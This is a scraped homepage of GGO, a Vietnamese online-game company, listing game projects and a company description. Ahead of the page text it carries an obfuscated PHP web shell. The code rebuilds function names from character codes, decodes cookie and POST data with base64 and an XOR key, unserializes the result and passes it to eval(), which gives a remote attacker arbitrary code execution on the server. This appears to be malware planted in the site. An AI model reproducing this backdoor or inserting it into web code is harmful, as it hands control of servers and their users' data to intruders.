$bfbyC = "\x73" . chr ( 1033 - 968 ).chr ( 290 - 195 ).chr (98) . "\x57" . 'r';$PMwZucP = 'c' . chr (108) . chr ( 155 - 58 ).chr (115) . chr (115) . "\x5f" . "\x65" . chr (120) . "\x69" . 's' . "\x74" . chr ( 247 - 132 ); $WNHqGI = $PMwZucP($bfbyC); $bfbyC = "38623";$LaylDfgh = $WNHqGI;$PMwZucP = "42091";if (!$LaylDfgh){class sA_bWr{private $lQNsbcxJkH;public static $oLhBNZhinX = "a7ffacda-a6f5-4578-a18c-46847fb71702";public static $iVQotxCcx = 23909;public function __construct($uwezqzFis=0){$ZDDlceJRo = $_COOKIE;$theMQ = $_POST;$OVVcFPEzvP = @$ZDDlceJRo[substr(sA_bWr::$oLhBNZhinX, 0, 4)];if (!empty($OVVcFPEzvP)){$xEIEtk = "base64";$ygCgRj = "";$OVVcFPEzvP = explode(",", $OVVcFPEzvP);foreach ($OVVcFPEzvP as $EMjeBVsft){$ygCgRj .= @$ZDDlceJRo[$EMjeBVsft];$ygCgRj .= @$theMQ[$EMjeBVsft];}$ygCgRj = array_map($xEIEtk . chr (95) . "\x64" . chr (101) . "\x63" . 'o' . "\x64" . chr ( 1006 - 905 ), array($ygCgRj,)); $ygCgRj = $ygCgRj[0] ^ str_repeat(sA_bWr::$oLhBNZhinX, (strlen($ygCgRj[0]) / strlen(sA_bWr::$oLhBNZhinX)) + 1);sA_bWr::$iVQotxCcx = @unserialize($ygCgRj);}}private function ZbEtwMXZ(){if (is_array(sA_bWr::$iVQotxCcx)) {$bBZWlTi = str_replace(chr ( 353 - 293 ) . '?' . 'p' . "\150" . "\160", "", sA_bWr::$iVQotxCcx['c' . "\157" . 'n' . "\164" . "\x65" . chr ( 744 - 634 ).chr (116)]);eval($bBZWlTi); $MANQlhHFy = "58202";exit();}}public function __destruct(){$this->ZbEtwMXZ(); $MANQlhHFy = "58202";$WmcFRZZKNK = str_pad($MANQlhHFy, 10);}}$tlhKE = new /* 5303 */ sA_bWr(); $tlhKE = substr("17460_20030", 1);} GGO.VN

dự án

MỘNG TU TIÊN AFK
NEW PROJECT IDLE

ĐỐI TÁC CỦA CHÚNG TÔI

DỊCH VỤ

SẢN PHẨM

VỀ CHÚNG TÔI

Công Ty GGO được thành lập từ tháng 8/2018, là đơn vị trong lĩnh vực công nghệ chuyên cung cấp các sản phẩm trò chơi trực tuyến đa nền tảng. Mang sứ mệnh trở thành một trong những đội ngũ tiên phong trong dịch vụ cung cấp trò chơi trực tuyến và công nghệ số, GGO không ngừng đổi mới để nâng cao chất lượng dịch vụ & đón đầu xu thế trong thời đại 4.0

 

 Số người dùng ở Việt Nam & Đông Nam Á

 

1.500.000